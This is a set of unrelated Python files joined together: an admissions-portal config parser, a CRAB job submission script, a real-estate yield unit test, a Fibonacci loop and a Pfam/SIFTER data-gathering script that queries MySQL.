import re
import sys
import numpy as np
from Portal.AdmissionDetails.AdmissionDetails import AdmissionDetails
from Portal.PersonalDetails.PersonalAttr import PersonalAttr
from Portal.PersonalDetails.PersonalDetails import PersonalDetails
from Portal.EducationalQualifications.EducationalQualifications import EducationalQualifications
from Portal.EducationalQualifications.EduAttr import EduAttr
from Portal.WorkExperience.WorkExperience import WorkExperience
from Portal.Attachments.Attachments import Attachments
from Portal.Attachments.AttachmentInfo import AttachmentInfo
from Portal.Attachments.Attachment import Attachment
from Portal.Constraints.ConstraintValidator import ConstraintValidator
from Portal.EducationalQualifications.SubAttr import SubAttr
from Portal.Constraints.ConstraintValidator import AttachmentConstraintValidator
class ConfigParser(object):
def __init__(self,configFilePath):
self.configFilePath = configFilePath
self.configFile = None
self.fileData = None
with open(self.configFilePath, 'r') as self.configFile:
self.fileData = self.configFile.read()
self.ADStartPattern = "AdmissionDetails:" #AD abbreviation for AdmissionDetails
self.ADEndPattern = "AdmissionDetailsEnd:"
self.PDStartPattern = "PersonalDetails:" #PD abbreviation for PersonalDetails
self.PDEndPattern = "PersonalDetailsEnd:"
self.PAStartPattern = "PersonalAttr:" #PA abbreviation for PersonalAttr
self.PAEndPattern = "PersonalAttrEnd:"
self.EQStartPattern = "EducationalQualifications:" #EQ abbreviation for EducationalQualifications
self.EQEndPattern = "EducationalQualificationsEnd:"
self.EAStartPattern = "EduAttr:" #EA abbreviation for EduAttr
self.EAEndPattern = "EduAttrEnd:"
self.SAStartPattern = "SubAttr:" #SA abbreviation for SubAttr
self.SAEndPattern = "SubAttrEnd:"
self.WEStartPattern = "WorkExperiences:" #WE abbreviation for WorkExperiences
self.WEEndPattern = "WorkExperiencesEnd:"
self.ASStartPattern = "Attachments:" #AS abbreviation for Attachments
self.ASEndPattern = "AttachmentsEnd:"
self.AIStartPattern = "AttachmentInfo:" #AI abbreviation for AttachmentInfo
self.AIEndPattern = "AttachmentInfoEnd:"
self.AStartPattern = "Attachment:" #A abbreviation for Attachment
self.AEndPattern = "AttachmentEnd:"
def getAdmissionDetails(self):
admissionInfo = AdmissionDetails()
ADregex = str(self.ADStartPattern + "((.|\n)*?)" + self.ADEndPattern)
AD = re.findall(ADregex, self.fileData)
for ADBlock in AD:
ADBlockInfo = re.findall(r'(\S[^:]+):\s*(.*\S)', ADBlock[0])
for info in ADBlockInfo:
if (info[0].lower() == "AdmissionDegree".lower()):
admissionInfo.AdmissionDegree = info[1]
elif (info[0].lower() == "AdmissionType".lower()):
admissionInfo.AdmissionType = info[1]
elif (info[0].lower() == "AdmissionMonth".lower()):
admissionInfo.AdmissionMonth = info[1]
elif (info[0].lower() == "AdmissionYear".lower()):
admissionInfo.AdmissionYear = info[1]
else:
print (info[0])
raise ValueError('Invalid field ' + info[0] + ' in config')
return admissionInfo
def getPersonalDetailsInfo(self):
personalDetails = PersonalDetails()
PDregex = str(self.PDStartPattern + "((.|\n)*?)" + self.PDEndPattern)
PD = str(re.findall(PDregex, self.fileData)[0][0])
PAregex = str(self.PAStartPattern + "((.|\n)*?)" + self.PAEndPattern)
PAs = re.findall(PAregex, PD)
PAs = [pa[0] for pa in PAs]
listOfPersonalAttr = []
listOfUniqeNames = []
for PABlock in PAs:
SAregex = str(self.SAStartPattern + "((.|\n)*?)" + self.SAEndPattern)
PAInfo = re.sub(SAregex, '', str(PABlock))
PAInfo = re.findall(r'(\S[^:]+):\s*(.*\S)', str(PAInfo))
personalAttr = PersonalAttr()
for info in PAInfo:
if (info[0].lower() == "PersonalAttrName".lower()):
personalAttr.PersonalAttrName = info[1]
elif (info[0].lower() == "PersonalAttrLabel".lower()):
personalAttr.PersonalAttrLabel = info[1]
elif (info[0].lower() == "MultipleEntries".lower()):
personalAttr.MultipleEntries = info[1]
elif (info[0].lower() == "IsOptional".lower()):
personalAttr.IsOptional = info[1]
else:
raise ValueError('Invalid field ' + info[0] + ' for PersonalAttr')
SAs = re.findall(SAregex, str(PABlock))
listOfSubAttr = []
for SABlock in SAs:
SABlockInfo = re.findall(r'(\S[^:]+):\s*(.*\S)', SABlock[0])
subAttr = SubAttr()
typeDict = {}
constraintDict = {}
for info in SABlockInfo:
if (info[0].lower() == "SubAttrName".lower()):
subAttr.SubAttrName = info[1]
listOfUniqeNames.append(personalAttr.PersonalAttrName+"."+subAttr.SubAttrName)
elif (info[0].lower() == "SubAttrLabel".lower()):
subAttr.SubAttrLabel = info[1]
elif (info[0].lower() == "IsTypeString".lower()):
subAttr.IsTypeString = info[1]
typeDict['String'] = subAttr.IsTypeString
elif (info[0].lower() == "IsTypeInteger".lower()):
subAttr.IsTypeInteger = info[1]
typeDict['Integer'] = subAttr.IsTypeInteger
elif (info[0].lower() == "IsTypeFloat".lower()):
subAttr.IsTypeFloat = info[1]
typeDict['Float'] = subAttr.IsTypeFloat
elif (info[0].lower() == "IsTypeDate".lower()):
subAttr.IsTypeDate = info[1]
typeDict['Date'] = subAttr.IsTypeDate
elif (info[0].lower() == "IsTypeBoolean".lower()):
subAttr.IsTypeBoolean = info[1]
typeDict['Boolean'] = subAttr.IsTypeBoolean
elif (info[0].lower() == "SubAttrChoices".lower()):
subAttr.SubAttrChoices = info[1]
subAttr.SubAttrChoicesFilter = info[1]
elif (info[0].lower() == "StringConstraints".lower()):
subAttr.StringConstraints = info[1]
constraintDict['String'] = subAttr.StringConstraints
elif (info[0].lower() == "IntegerConstraints".lower()):
subAttr.IntegerConstraints = info[1]
constraintDict['Integer'] = subAttr.IntegerConstraints
elif (info[0].lower() == "FPConstraints".lower()):
subAttr.FPConstraints = info[1]
constraintDict['Float'] = subAttr.FPConstraints
elif (info[0].lower() == "BooleanConstraints".lower()):
subAttr.BooleanConstraints = info[1]
constraintDict['Boolean'] = subAttr.BooleanConstraints
elif (info[0].lower() == "DateConstraints".lower()):
subAttr.DateConstraints = info[1]
constraintDict['Date'] = subAttr.DateConstraints
elif (info[0].lower() == "IsOptional".lower()):
subAttr.IsOptional = info[1]
else:
raise ValueError('Invalid field ' + info[0] + ' in config')
constraintValidator = ConstraintValidator(typeDict,constraintDict)
constraintValidator.validate()
listOfSubAttr.append(subAttr)
personalAttr.ListOfSubAttr = listOfSubAttr
listOfPersonalAttr.append(personalAttr)
personalDetails.listOfPersonalAttr = listOfPersonalAttr
if (len(listOfUniqeNames) != len(list(set(listOfUniqeNames)))):
raise ValueError('PersonalAttrName.SubAttrName must be unique in PersonalDetails')
return personalDetails
def getEducationalQualificationsInfo(self):
educationalQualifications = EducationalQualifications()
EQregex = str(self.EQStartPattern + "((.|\n)*?)" + self.EQEndPattern)
EQ = str(re.findall(EQregex, self.fileData)[0][0])
EAregex = str(self.EAStartPattern + "((.|\n)*?)" + self.EAEndPattern)
EAs = re.findall(EAregex, EQ)
EAs = [ea[0] for ea in EAs]
listOfEduAttr = []
listOfUniqeNames = []
for EABlock in EAs:
SAregex = str(self.SAStartPattern + "((.|\n)*?)" + self.SAEndPattern)
EAInfo = re.sub(SAregex, '', str(EABlock))
EAInfo = re.findall(r'(\S[^:]+):\s*(.*\S)', str(EAInfo))
eduAttr = EduAttr()
for info in EAInfo:
if (info[0].lower() == "EduAttrName".lower()):
eduAttr.EduAttrName = info[1]
elif (info[0].lower() == "EduAttrLabel".lower()):
eduAttr.EduAttrLabel = info[1]
elif (info[0].lower() == "MultipleEntries".lower()):
eduAttr.MultipleEntries = info[1]
elif (info[0].lower() == "IsOptional".lower()):
eduAttr.IsOptional = info[1]
else:
raise ValueError('Invalid field ' + info[0] + ' for EduAttr')
SAs = re.findall(SAregex, str(EABlock))
listOfSubAttr = []
for SABlock in SAs:
SABlockInfo = re.findall(r'(\S[^:]+):\s*(.*\S)', SABlock[0])
subAttr = SubAttr()
typeDict = {}
constraintDict = {}
for info in SABlockInfo:
if (info[0].lower() == "SubAttrName".lower()):
subAttr.SubAttrName = info[1]
listOfUniqeNames.append(eduAttr.EduAttrName+"."+subAttr.SubAttrName)
elif (info[0].lower() == "SubAttrLabel".lower()):
subAttr.SubAttrLabel = info[1]
elif (info[0].lower() == "IsTypeString".lower()):
subAttr.IsTypeString = info[1]
typeDict['String'] = subAttr.IsTypeString
elif (info[0].lower() == "IsTypeInteger".lower()):
subAttr.IsTypeInteger = info[1]
typeDict['Integer'] = subAttr.IsTypeInteger
elif (info[0].lower() == "IsTypeFloat".lower()):
subAttr.IsTypeFloat = info[1]
typeDict['Float'] = subAttr.IsTypeFloat
elif (info[0].lower() == "IsTypeDate".lower()):
subAttr.IsTypeDate = info[1]
typeDict['Date'] = subAttr.IsTypeDate
elif (info[0].lower() == "IsTypeBoolean".lower()):
subAttr.IsTypeBoolean = info[1]
typeDict['Boolean'] = subAttr.IsTypeBoolean
elif (info[0].lower() == "SubAttrChoices".lower()):
subAttr.SubAttrChoices = info[1]
subAttr.SubAttrChoicesFilter = info[1]
elif (info[0].lower() == "StringConstraints".lower()):
subAttr.StringConstraints = info[1]
constraintDict['String'] = subAttr.StringConstraints
elif (info[0].lower() == "IntegerConstraints".lower()):
subAttr.IntegerConstraints = info[1]
constraintDict['Integer'] = subAttr.IntegerConstraints
elif (info[0].lower() == "FPConstraints".lower()):
subAttr.FPConstraints = info[1]
constraintDict['Float'] = subAttr.FPConstraints
elif (info[0].lower() == "BooleanConstraints".lower()):
subAttr.BooleanConstraints = info[1]
constraintDict['Boolean'] = subAttr.BooleanConstraints
elif (info[0].lower() == "DateConstraints".lower()):
subAttr.DateConstraints = info[1]
constraintDict['Date'] = subAttr.DateConstraints
elif (info[0].lower() == "IsOptional".lower()):
subAttr.IsOptional = info[1]
else:
raise ValueError('Invalid field ' + info[0] + ' in config')
constraintValidator = ConstraintValidator(typeDict,constraintDict)
constraintValidator.validate()
listOfSubAttr.append(subAttr)
eduAttr.ListOfSubAttr = listOfSubAttr
listOfEduAttr.append(eduAttr)
educationalQualifications.listOfEduAttr = listOfEduAttr
if (len(listOfUniqeNames) != len(list(set(listOfUniqeNames)))):
raise ValueError('EduAttrName.SubAttrName must be unique in EducationalQualifications')
return educationalQualifications
def getWorkExperienceInfo(self):
workExperience = WorkExperience()
WEregex = str(self.WEStartPattern + "((.|\n)*?)" + self.WEEndPattern)
WE = str(re.findall(WEregex, self.fileData)[0][0])
SAregex = str(self.SAStartPattern + "((.|\n)*?)" + self.SAEndPattern)
WEInfo = re.sub(SAregex, '', str(WE))
WEInfo = re.findall(r'(\S[^:]+):\s*(.*\S)', str(WEInfo))
for info in WEInfo:
if (info[0].lower() == "MultipleEntries".lower()):
workExperience.MultipleEntries = info[1]
elif (info[0].lower() == "IsOptional".lower()):
workExperience.IsOptional = info[1]
else:
raise ValueError('Invalid field ' + info[0] + ' for WorkExperience in config')
SAs = re.findall(SAregex, WE)
listOfSubAttr = []
listOfUniqeNames = []
for SABlock in SAs:
SABlockInfo = re.findall(r'(\S[^:]+):\s*(.*\S)', SABlock[0])
subAttr = SubAttr()
typeDict = {}
constraintDict = {}
for info in SABlockInfo:
if (info[0].lower() == "SubAttrName".lower()):
subAttr.SubAttrName = info[1]
listOfUniqeNames.append(subAttr.SubAttrName)
elif (info[0].lower() == "SubAttrLabel".lower()):
subAttr.SubAttrLabel = info[1]
elif (info[0].lower() == "IsTypeString".lower()):
subAttr.IsTypeString = info[1]
typeDict['String'] = subAttr.IsTypeString
elif (info[0].lower() == "IsTypeInteger".lower()):
subAttr.IsTypeInteger = info[1]
typeDict['Integer'] = subAttr.IsTypeInteger
elif (info[0].lower() == "IsTypeFloat".lower()):
subAttr.IsTypeFloat = info[1]
typeDict['Float'] = subAttr.IsTypeFloat
elif (info[0].lower() == "IsTypeDate".lower()):
subAttr.IsTypeDate = info[1]
typeDict['Date'] = subAttr.IsTypeDate
elif (info[0].lower() == "IsTypeBoolean".lower()):
subAttr.IsTypeBoolean = info[1]
typeDict['Boolean'] = subAttr.IsTypeBoolean
elif (info[0].lower() == "SubAttrChoices".lower()):
subAttr.SubAttrChoices = info[1]
subAttr.SubAttrChoicesFilter = info[1]
elif (info[0].lower() == "StringConstraints".lower()):
subAttr.StringConstraints = info[1]
constraintDict['String'] = subAttr.StringConstraints
elif (info[0].lower() == "IntegerConstraints".lower()):
subAttr.IntegerConstraints = info[1]
constraintDict['Integer'] = subAttr.IntegerConstraints
elif (info[0].lower() == "FPConstraints".lower()):
subAttr.FPConstraints = info[1]
constraintDict['Float'] = subAttr.FPConstraints
elif (info[0].lower() == "BooleanConstraints".lower()):
subAttr.BooleanConstraints = info[1]
constraintDict['Boolean'] = subAttr.BooleanConstraints
elif (info[0].lower() == "DateConstraints".lower()):
subAttr.DateConstraints = info[1]
constraintDict['Date'] = subAttr.DateConstraints
elif (info[0].lower() == "IsOptional".lower()):
subAttr.IsOptional = info[1]
else:
raise ValueError('Invalid field ' + info[0] + ' in config')
constraintValidator = ConstraintValidator(typeDict,constraintDict)
constraintValidator.validate()
listOfSubAttr.append(subAttr)
workExperience.ListOfSubAttr = listOfSubAttr
if (len(listOfUniqeNames) != len(list(set(listOfUniqeNames)))):
raise ValueError('SubAttrName must be unique in WorkExperience')
return workExperience
def getAttachmentsInfo(self):
attachments = Attachments()
ASregex = str(self.ASStartPattern + "((.|\n)*?)" + self.ASEndPattern)
ASs = str(re.findall(ASregex, self.fileData)[0][0])
AIregex = str(self.AIStartPattern + "((.|\n)*?)" + self.AIEndPattern)
AIs = re.findall(AIregex, ASs)
AIs = [ai[0] for ai in AIs]
listOfAttachmentInfo = []
listOfUniqeNames = []
for AIBlock in AIs:
Aregex = str(self.AStartPattern + "((.|\n)*?)" + self.AEndPattern)
AIInfo = re.sub(Aregex, '', str(AIBlock))
AIInfo = re.findall(r'(\S[^:]+):\s*(.*\S)', str(AIInfo))
attachmentInfo = AttachmentInfo()
for info in AIInfo:
if (info[0].lower() == "AttachmentInfoName".lower()):
attachmentInfo.AttachmentInfoName = info[1]
elif (info[0].lower() == "AttachmentInfoLabel".lower()):
attachmentInfo.AttachmentInfoLabel = info[1]
elif (info[0].lower() == "MultipleEntries".lower()):
attachmentInfo.MultipleEntries = info[1]
elif (info[0].lower() == "IsOptional".lower()):
attachmentInfo.IsOptional = info[1]
else:
raise ValueError('Invalid field ' + info[0] + ' for AttachmentInfo')
As = re.findall(Aregex, str(AIBlock))
listOfAttachment = []
for ABlock in As:
ABlockInfo = re.findall(r'(\S[^:]+):\s*(.*\S)', ABlock[0])
attachment = Attachment()
typeDict = {}
for info in ABlockInfo:
if (info[0].lower() == "AttachmentName".lower()):
attachment.AttachmentName = info[1]
listOfUniqeNames.append(attachmentInfo.AttachmentInfoName+"."+attachment.AttachmentName)
elif (info[0].lower() == "AttachmentLabel".lower()):
attachment.AttachmentLabel = info[1]
elif (info[0].lower() == "IsTypeFile".lower()):
attachment.IsTypeFile = info[1]
typeDict['IsTypeFile'] = attachment.IsTypeFile
elif (info[0].lower() == "IsTypeImage".lower()):
attachment.IsTypeImage = info[1]
typeDict['IsTypeImage'] = attachment.IsTypeImage
elif (info[0].lower() == "IsOptional".lower()):
attachment.IsOptional = info[1]
else:
raise ValueError('Invalid field ' + info[0] + ' in config')
attachmentConstraintValidator = AttachmentConstraintValidator(typeDict)
attachmentConstraintValidator.validate()
listOfAttachment.append(attachment)
attachmentInfo.ListOfAttachment = listOfAttachment
listOfAttachmentInfo.append(attachmentInfo)
attachments.listOfAttachmentInfo = listOfAttachmentInfo
if (len(listOfUniqeNames) != len(list(set(listOfUniqeNames)))):
            raise ValueError('AttachmentInfoName.AttachmentName must be unique in Attachments')
return attachments
# def main():
# configParser = ConfigParser("/home/adildangui/Desktop/webDev/djangoProject/Portal/createForm.cfg")
# print (configParser.getAdmissionDetails())
# print (configParser.getEducationalQualificationsInfo().listOfEduAttr[2].ListOfSubAttr[0].IsTypeInteger)
# print (configParser.getWorkExperienceInfo())
# print (configParser.getAttachmentsInfo())
# main()
|
"""treadmill.cli.admin tests"""
|
#!/usr/bin/env python
import subprocess, sys
from collections import namedtuple
Dataset = namedtuple('dataset', ['name', 'path' ])
Prod = namedtuple('prod', ['name' ])
#####################
def gitCheckForUncommittedChanges(repoDir):
cmd = ['git', 'diff', '--name-only', 'HEAD']
    p = subprocess.Popen(cmd, cwd=repoDir, stdout=subprocess.PIPE)
    # communicate() waits for the process to exit; calling wait() first can deadlock on a full pipe
    (out, err) = p.communicate()
if (out != "") :
print "There are uncommited changes in", repoDir
print "Exiting."
sys.exit(-1)
def gitCheckForTag(repoDir):
cmd = ['git', 'describe', '--tags', '--exact-match', 'HEAD']
    p = subprocess.Popen(cmd, cwd=repoDir, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    # communicate() waits for the process to exit; calling wait() first can deadlock on a full pipe
    (out, err) = p.communicate()
if (err != "") :
print "There is no tag associated to HEAD in", repoDir
print "Exiting."
sys.exit(-1)
#####################
def launchProduction(prodConfig, datasets, checkUncommitedChanges = True, checkTag = True) :
if (checkUncommitedChanges) :
gitCheckForUncommittedChanges("../IPHCFlatTree/")
else :
print "====================================================================="
print " * Warning * Skipping check for uncommited changes in IPHCFlatTree !"
print "====================================================================="
if (checkTag) :
gitCheckForTag("../IPHCFlatTree/")
else :
print "==================================================================================="
print " * Warning * Skipping check for tag associated to current commit in IPHCFlatTree !"
print "==================================================================================="
print " ====== "
print " Submitting production named", prodConfig.name
print " ====== "
for dataset in datasets :
print " "
print " > Submitting task for dataset", dataset.name, "..."
print " "
# Write config file using template
with open("./crabConfig.py","w") as f :
f.write('datasetName="'+dataset.name+'"\n')
f.write('datasetPath="'+dataset.path+'"\n')
f.write('prodTag="'+prodConfig.name+'"\n')
# Dump crab config template
with open("common/crabConfigTemplate.py","r") as template :
for line in template :
f.write(line)
f.close()
# Submit task
cmd = ['crab', 'submit']
p = subprocess.Popen(cmd)
p.wait()
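# A minimal usage sketch (hypothetical dataset names and paths), showing how the
# namedtuples defined above feed into launchProduction:
#
#   datasets = [
#       Dataset(name="TTJets", path="/TTJets_TuneCUETP8M1_13TeV/.../MINIAODSIM"),
#       Dataset(name="DYJetsToLL_M50", path="/DYJetsToLL_M-50_13TeV/.../MINIAODSIM"),
#   ]
#   prod = Prod(name="prodTest_v1")
#   launchProduction(prod, datasets, checkUncommitedChanges=True, checkTag=True)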
|
"""Top-level package for Math Trees."""
__author__ = """Sean Boyle"""
__email__ = 'sean.boyle@pearson.com'
__version__ = '0.1.0'
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import unittest
import os
import json
from analyse_immo.factory import Factory
from analyse_immo.rendement import Rendement
# from analyse_immo.database import Database
# from analyse_immo.impots.annexe_2044 import Annexe_2044
class TestSimulationB(unittest.TestCase):
    '''
    The data is incomplete ...
    listing price: 120K
    offer amount: 95K, 85K (-10%), 76K (-20%)
    negotiation %: 20.83%, 28.75%, 36.67%
    notary fees: 7600, 6840, 6080
    renovation work: 91780.27, 91780.27, 91780.27
    total: 194380, 184120, 173860
    monthly rent (excl. charges): 1650, .., ..
    property tax: 1700, x, x
    management (annual): 7%, 1386
    surface area: 170
    insurance price per m2: 1.50
    insurance: 255
    loan rate: 2%
    loan duration: 20
    monthly payment: 981.67, 929.86, 878.04
    annual cash flow: 4679, 5301, 5923
    gross yield: 10.60, 11.17, 11.80
    net yield (before tax): 8.47, 8.94, 9.47
    '''
def setUp(self):
__location__ = os.path.realpath(os.path.join(os.getcwd(), os.path.dirname(__file__)))
__DATA_TEST_PATHNAME = os.path.join(__location__, 'data', 'input_test_simulation_B.json')
with open(__DATA_TEST_PATHNAME, 'r') as file:
input_data = json.load(file)
self.achat_data = input_data['achat']
self.lots_data = input_data['lots']
self.credit_data = input_data['credit']
self.bi = Factory.make_bien_immo(self.achat_data, self.lots_data)
self.credit = Factory.make_credit(self.credit_data, self.bi)
self.rdt = Rendement(self.bi, self.credit)
# database = Database()
# self.irr = Annexe_2044(database, self.bi, self.credit, 0.11)
def testOffre(self):
self.assertEqual(self.bi.notaire_montant, 7600)
self.assertEqual(self.bi.notaire_taux, 0.08)
self.assertAlmostEqual(self.bi.financement_total, 194380, 0)
@unittest.skip('fixme')
def testCredit(self):
self.assertAlmostEqual(self.credit.get_mensualite_avec_assurance(), 981.67, 2)
@unittest.skip('fixme')
def testRendement(self):
self.assertAlmostEqual(self.rdt.rendement_brut, 0.1060, 4)
if __name__ == '__main__':
unittest.main()
|
n=int(input("Enter a limit:"))
a=0
b=1
s=0
for i in range(0,n):
s=a+b
a=b
b=s
print(s)
|
#!/usr/bin/python
import os
import pickle
from Bio import AlignIO,Phylo,SeqIO
from Bio.SeqRecord import SeqRecord
from Bio.Phylo import PhyloXMLIO,PhyloXML
import ete2
from ete2 import Phyloxml
import sys
import StringIO
import gzip
import subprocess
import getopt
import copy
import _mysql as mysql
import _mysql_exceptions as mysql_exceptions
import MySQLdb.cursors
sys.path.append(os.path.dirname(os.path.dirname(os.path.realpath(__file__)))+'/lib/pplacer_python_scripts')
from PplacerWrapper import GuppyWrapper
from PplacerWrapper import PplacerWrapper
from PfamHMMERAlign import PfamHMMERAlign
import Queue
import threading
import re
import random
def usage():
print "\n-----------------------------------------------------------------"
print "Usage: "
print " sifter_gather_family_data.py [options] <families_data_folder>"
print "-----------------------------------------------------------------\n"
print "Examples:"
print " sifter_gather_family_data.py -f PF12491,PF13820 ../example/fam_data\n"
print " sifter_gather_family_data.py -i ../example/family_list.txt ../example/fam_data\n"
print " sifter_gather_family_data.py -f PF09172 --dbaddr www.example.org --dbuser jack --dbpass 1234 ../example/fam_data\n"
print "This function gather necessary 'alignment', 'tree', and 'evidence' files needed to run SIFTER for each query family."
print "\nTo gather data for a set of sequences (of a novel genome) which is not already in Pfam, you may enter the sequences file, the pfam hit file (found by pfam_scan.pl), and the NCBI taxonomy ID of your geneome of interest:"
print "Examples:"
print " sifter_gather_family_data.py -f PF07083,PF14343,PF03818 --seq_file ../example/myseq.fasta --hit_file ../example/pfam_res.txt --taxid 1192197 ../example/fam_data\n"
print " sifter_gather_family_data.py -A --seq_file myseq.fasta --hit_file ../example/pfam_res.txt --taxid 1192197 ../example/fam_data\n"
print "@author Sayed Mohammad Ebrahim Sahraeian (mohammad@compbio.berkeley.edu)"
print "Please cite new paper:"
print "-Sahraeian SME, Luo KR, Brenner SE (2015)"
print "The SIFTER algorithm presented rin the following paper:"
print "- Engelhardt BE, Jordan MI, Srouji JR, Brenner SE. 2011. Genome-scale phylogenetic function annotation of large and diverse protein families. Genome Research 21:1969-1980. \n"
print "inputs:"
print " <families_data_folder> Path to the folder where the"
print " families data will be placed."
print "options: (you should only use one of -i or -f or -A options.)"
print " -f STRING List of Pfam families for which you"
print " want to gather necessary data."
print " (in comma seperated format)"
print " -i STRING Path to the input file where the lis"
print " of families are placed."
print " --seq_file STRING The fasta format input sequences file"
print " of the novel genome."
print " --hit_file STRING Output of pfam_scan.pl file on the "
print " novel genome. This file consists of"
print " the list of pfam hits for the genome."
print " --taxid INT The NCBI taxonomy ID of the genome. If"
print " the tax-ID is not in the species"
print " tree, you may enter the NCBI taxonomy"
print " ID of a close species."
print " -A Run on all Pfam families of queried"
print " novel genome."
print " -n INT Number of threads (Default=4)"
print " --dbaddr STRING Address of the MySQL database that"
print " has neccessary data for SIFTER"
print " [Default: localhost]"
print " --dbname STRING Name of the MySQL database that"
print " has neccessary data for SIFTER"
print " [Default: sifter_db]"
print " --dbuser STRING Name of the MySQL database that"
print " has neccessary data for SIFTER"
print " [Default: root]"
print " --dbpass STRING Password of the user for the MySQL"
print " database that has neccessary data"
print " for SIFTER [Default: '']"
print " -h Help. Print Usage."
def msql(query, db):
c = db.cursor()
c.execute(query)
results = c.fetchall()
c.close()
return results
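# Note: with the MySQLdb DictCursor connections used below, msql returns a tuple of
# row dicts, e.g. msql("select pfamA_acc from pfamA limit 1", db) might yield
# something like ({'pfamA_acc': 'PF00001'},).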
# See how many sequences are in each family, add it to pfds
def get_pfds(pfams,db):
pfds={}
for p in pfams:
sql_q="""select pfamA.num_full, pfamA.number_species, pfamA.pfamA_id, pfamA.description, group_concat(go_id) as go_ids, group_concat(term) as go_terms from pfamA left join gene_ontology on gene_ontology.auto_pfamA = pfamA.auto_pfamA where pfamA.pfamA_acc='%s' group by pfamA_acc
"""%(p)
#AND Locus.type=1
#AND Synonym.type=2
r = msql(sql_q, db)
if r:
pfds[p]={}
for w in r[0].keys():
pfds[p][w]=r[0][w]
else:
print "%s is a wrong Pfam ID and will be excluded."%p
return pfds
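# Illustrative shape of the returned mapping, based on the columns selected above
# (the values shown are hypothetical):
#   pfds['PF12491'] -> {'num_full': 1234, 'number_species': 456, 'pfamA_id': 'SomeFam',
#                       'description': '...', 'go_ids': 'GO:0003677,GO:0005524',
#                       'go_terms': 'DNA binding,ATP binding'}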
# ##2-Extract alignment information for each Pfam family
def get_pfam_alignment_by_id(pfam_id, outpt_fname,db):
# Get file from MySQL query, gunzip, and save into query directory.
mysql_aq = "(select auto_pfamA from pfamA where pfamA_acc='" + pfam_id + "')"
mysql_q = "select alignment from alignments_and_trees " + "where auto_pfamA = "+mysql_aq+" " + "and type='full';"
    gzipped = True  # this field is gzipped in the table
print mysql_q
res = msql(mysql_q, db)
print len(res)
if len(res) == 0:
return
t_data = ''
f_output = open(outpt_fname, "w")
if gzipped:
f_gzipped = StringIO.StringIO(res[0]['alignment'])
f = gzip.GzipFile(fileobj=f_gzipped, mode='rbU')
t_data = f.read()
f_output.write(t_data)
f.close()
f_gzipped.close()
else:
t_data = res[0]['alignment']
f_output.write(t_data)
f_output.close()
def get_alignment(pfam_id,my_db):
outpt_fname = alignment_folder+'/%s'%pfam_id
if not(os.path.isfile(outpt_fname+".fasta.gz")):
print "Saving alignment for", pfam_id
print ""
get_pfam_alignment_by_id(pfam_id=pfam_id, outpt_fname=outpt_fname+".sth",db=my_db)
AlignIO.convert(outpt_fname+".sth","stockholm",outpt_fname+".fasta","fasta")
if os.path.exists('%s.fasta.gz'%(outpt_fname)):
subprocess.check_call("rm %s.fasta.gz"%(outpt_fname),shell=True)
subprocess.check_call("gzip %s.fasta"%(outpt_fname),shell=True)
def find_pfam_hits_from_file(hit_file,my_sequence_file):
pplacer_queries={}
with open(hit_file, 'rb') as infile:
for line in infile:
line=line.strip()
if not line:
continue
if len(line)<3:
continue
if line[0]=="#" and not line[2]=="<":
continue
if line[0]=="#" and line[2]=="<":
keys=line.split('> <')
keys[0]=keys[0].split('<')[1]
keys[-1]=keys[-1].split('>')[0]
continue
row=line.split()
if not len(row)==15:
print "Number of columns are not writ in this line, will skip the line:\n %s"%line
continue
r={k:row[i] for i,k in enumerate(keys)}
if r['significance']=='1':
pfam_id=r['hmm acc'][0:r['hmm acc'].find('.')]
gene_pplacer_id=r['seq id']
gene_pplacer_id+='/'+r['envelope start']+'-'+r['envelope end']
if pfam_id not in pplacer_queries.keys():
pplacer_queries[pfam_id]=[{'pplacer_id':gene_pplacer_id,'id':r['seq id'],'seq_start':int(r['envelope start']),'seq_end':int(r['envelope end'])}]
else:
pplacer_queries[pfam_id].append({'pplacer_id':gene_pplacer_id,'id':r['seq id'],'seq_start':int(r['envelope start']),'seq_end':int(r['envelope end'])})
gene_seq={}
handle = open(my_sequence_file, "rU")
for record in SeqIO.parse(handle, "fasta") :
gene_seq[record.id]=record.seq
print "Your queried novel genome has:"
print len(gene_seq), "sequences"
print len(set([v['id'] for w in pplacer_queries.values() for v in w])), "genes in pfam"
print len(pplacer_queries), "pfam families\n"
return gene_seq, pplacer_queries
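# Illustrative shape of the returned structures (values hypothetical):
#   gene_seq        -> {'gene_001': Seq('MKT...'), ...}
#   pplacer_queries -> {'PF07083': [{'pplacer_id': 'gene_001/10-120', 'id': 'gene_001',
#                                    'seq_start': 10, 'seq_end': 120}, ...], ...}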
def find_tax_name(ncbi_taxid,db):
sql_q="""select species from ncbi_taxonomy where ncbi_taxid='%s' limit 1;
"""%(ncbi_taxid)
my_id = msql(sql_q, db)
if my_id:
my_id=my_id[0]['species']
return my_id
def find_ncbi_taxid(pfamseq_id,db):
sql_q="""select ncbi_taxid,species from pfamseq where pfamseq_id='%s';
"""%(pfamseq_id)
my_id = msql(sql_q, db)
if not my_id:
if pfamseq_id in gene_seq:
my_id=({'ncbi_taxid': my_taxid, 'species': my_taxid},)
return max([int(w['ncbi_taxid']) for w in my_id])
def find_taxid(unip_id,db):
sql_q="""select tax_id from goa_db where uniprot_id='%s';
"""%(unip_id)
my_id = msql(sql_q, db)
if my_id:
return max([int(w['tax_id']) for w in my_id])
else:
return my_id
def find_tax_id_unip(unip_id,db):
sql_q="""SELECT pfamseq_acc
FROM pfamseq
WHERE pfamseq_id='%s';
"""%(unip_id)
my_id = msql(sql_q, db)
if not(my_id):
tax_id=find_ncbi_taxid(unip_id,db)
if tax_id>0:
sp=find_tax_name(tax_id,db)
return(tax_id,sp)
if not(my_id):
if unip_id in gene_seq:
tax_id=my_taxid
sp=my_taxid
return(tax_id,sp)
else:
my_id=({'pfamseq_acc':unip_id.split('_')[0]},)
tax_id=find_taxid(my_id[0]['pfamseq_acc'],db)
if tax_id:
sp=find_tax_name(tax_id,db)
if sp:
return (tax_id,sp)
else:
return(tax_id,'')
sql_q="""SELECT ncbi_id
FROM uniprot_2_NCBI
WHERE uniprot_id='%s';
"""%(my_id[0]['pfamseq_acc'])
my_id2 = msql(sql_q, db)
if my_id2:
tax_id=max([w['ncbi_id'] for w in my_id2])
sp=find_tax_name(tax_id,db)
return (tax_id,sp)
else:
tax_id=find_ncbi_taxid(unip_id,db)
if tax_id>0:
sp=find_tax_name(tax_id,db)
return(tax_id,sp)
if unip_id in gene_seq:
tax_id=my_taxid
sp=my_taxid
return(tax_id,sp)
else:
p_code=unip_id.split('_')[1]
if p_code in zero_taxids:
tax_id=zero_taxids[p_code]
sp=find_tax_name(tax_id,db)
return (tax_id,sp)
